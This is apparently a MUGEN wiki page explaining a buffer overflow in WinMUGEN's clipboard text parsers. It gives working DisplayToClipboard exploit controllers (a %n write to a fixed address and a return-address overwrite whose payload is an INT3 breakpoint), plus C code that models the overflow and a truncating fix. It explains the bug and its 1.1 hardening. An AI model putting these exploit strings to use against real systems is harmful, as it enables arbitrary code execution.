Void method

Last-modified: 2025-10-21 (Tue) 04:58:45

Clipboard Overflow, also known as the Void Method or the DisplayToClipboard/AppendToClipboard Buffer Overflow Attack, is a vulnerability in WinMUGEN that allows arbitrary code execution during a match.

Before the StateDef Overflow exploits were standardized, this was one of the vulnerabilities most often used by authors to execute code, typically to obtain the engine's memory pointers and to interfere with the opponent.

Exploit Details

As the vulnerability's technical name implies, it relies on a buffer overflow in the DisplayToClipboard and AppendToClipboard text parsers. Both parsers format the text into a 1024-byte buffer, but neither checks the length of the result. A format specifier whose field width pads the output up to the buffer size therefore pushes whatever follows it in the Text string past the end of the buffer and over the stack slots behind it, including the parser's saved return address; the bytes that follow the padding become the new return address, and control flow is redirected to the attacker's code.

Two examples of a DisplayToClipboard state controller whose width specifier is long enough to overflow the text parser's buffer:

[StateDef 255]

;Indirect Mode
;Usually paired with the %n exploit to write code before calling this exploit:
;"%.*d" with precision 204 prints 204 characters, so the following %n stores 204 (0xCC, an INT3 opcode)
;at the address given by the third Params value, 4931680 (0x4B4060). In the second controller,
;"`@K" plus the terminating NUL (60 40 4B 00) overwrites the return address with 0x004B4060, the same address.
[State Sample.Test]
Type = DisplayToClipboard
Trigger1 = 1
Text = "%.*d%n%d"
Params = 204,0,4931680
[State Sample.Test]
Type = DisplayToClipboard
Trigger1 = 1
Text = "%1024u`@K"

;Direct Mode
;The return address is redirected into the state controller's Text memory region, so the width specifier
;has to be adjusted to the shellcode's length: "Ì" (0xCC) plus 1023 padding characters fill the 1024-byte
;buffer exactly, and "BkA" plus the terminating NUL (42 6B 41 00) overwrites the return address.
;(0xCC is an INT3 opcode, so in this case execution stops at a breakpoint.)
[State Sample.Test]
Type = DisplayToClipboard
Trigger1 = 1
Text = "Ì%1023uBkA"

1.0/1.1

Although the vulnerability still exists in 1.0, it cannot be used directly, because the NX bit (DEP) is active for the process, so a parsing-type exploit is required to make it usable. In 1.1 it no longer works at all: text strings are truncated to the parser's buffer size, and stack canaries are enabled as well. A similar state controller can, however, be built with those parsing exploits.
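The following C is an added illustration and not WinMUGEN code (the engine's parser is a closed binary). It models the DisplayToClipboard/AppendToClipboard parsers as an unchecked vsprintf into a 1024-byte stack buffer and shows three things from this page: the length check the original parsers lacked, applied to the two controllers above; the four bytes each controller drops onto the slot right after the buffer (the saved return address, per the Exploit Details section); and a truncating variant that behaves like the 1.1 parser described in this section. It assumes the 1024-byte size stated above, that the slot after the buffer is the return address, a little-endian x86 host, and that the `%u` in the controllers receives 0 (any unsigned value gives the same overwrite, because the field width pads it).

```c
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CLIP_BUF    1024  /* parser buffer size stated on the page */
#define INT3_OPCODE 0xCC  /* x86 breakpoint; the byte both controllers plant */

/* Length the format would produce (NUL excluded) without writing anything.
 * This is the bounds check the original parsers are described as lacking. */
static int vformatted_len(const char *fmt, va_list ap)
{
    va_list copy;
    va_copy(copy, ap);
    int n = vsnprintf(NULL, 0, fmt, copy);
    va_end(copy);
    return n;
}

static int formatted_len(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vformatted_len(fmt, ap);
    va_end(ap);
    return n;
}

/* Bytes, terminating NUL included, that an unchecked vsprintf into a
 * CLIP_BUF-byte stack buffer would write past its end; 0 means it fits. */
static int spill_bytes(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vformatted_len(fmt, ap);
    va_end(ap);
    if (n < 0) return -1;
    return n + 1 > CLIP_BUF ? n + 1 - CLIP_BUF : 0;
}

/* The four bytes that land right after the buffer, read as a little-endian
 * x86 dword. In this model that slot is the saved return address (the page's
 * claim about WinMUGEN's stack, assumed here, not verified). The text goes
 * into a buffer 4 bytes wider than CLIP_BUF so the overflow can be observed
 * without corrupting anything. Returns 0 if fewer than 4 bytes spill. */
static uint32_t spilled_dword(const char *fmt, ...)
{
    unsigned char model[CLIP_BUF + 4 + 1];
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf((char *)model, sizeof model, fmt, ap);
    va_end(ap);
    if (n < 0 || n + 1 < CLIP_BUF + 4) return 0;
    const unsigned char *p = model + CLIP_BUF;
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Hardened parser shaped like the page's description of 1.1: the text is cut
 * at the buffer size, so padding can never reach the slot after the buffer.
 * Returns the length of what actually lands in the buffer (at most 1023). */
static int hardened_output_len(const char *fmt, ...)
{
    char buf[CLIP_BUF];
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(buf, sizeof buf, fmt, ap);
    va_end(ap);
    if (n < 0) return -1;
    return (int)strlen(buf);
}

int main(void)
{
    /* Direct mode: "\xCC" (the page's "Ì") plus 1023 padding characters fill
     * the buffer exactly; "BkA" and the NUL spill as 42 6B 41 00. */
    printf("direct:   spill=%d, dword after buffer=0x%08X\n",
           spill_bytes("\xCC%1023uBkA", 0u),
           (unsigned)spilled_dword("\xCC%1023uBkA", 0u));
    /* Indirect mode: "%.*d" with precision 204 prints 204 digits, so the %n
     * that follows it in the page's controller stores 204 = 0xCC (INT3) at
     * the third Params value, 4931680 = 0x4B4060. The second controller's
     * "`@K" + NUL spills as 60 40 4B 00, the same address. (%n itself is not
     * used here.) */
    printf("indirect: %%n stores %d (0x%02X), dword after buffer=0x%08X (%u)\n",
           formatted_len("%.*d", 204, 0), formatted_len("%.*d", 204, 0),
           (unsigned)spilled_dword("%1024u`@K", 0u),
           (unsigned)spilled_dword("%1024u`@K", 0u));
    /* Benign text, and the truncating parser applied to the exploit string. */
    printf("benign:   spill=%d\n", spill_bytes("Health: %d", 1000));
    printf("hardened: keeps %d of %d characters\n",
           hardened_output_len("%1024u`@K", 0u), formatted_len("%1024u`@K", 0u));
    return 0;
}
```

Compile with any C99 compiler and run; the spilled dword for the second Indirect Mode controller comes out as 0x004B4060, which is the decimal 4931680 passed to the first controller, and the hardened parser keeps only 1023 characters of either exploit string, which is why the 1.1 parser cannot be overflowed this way.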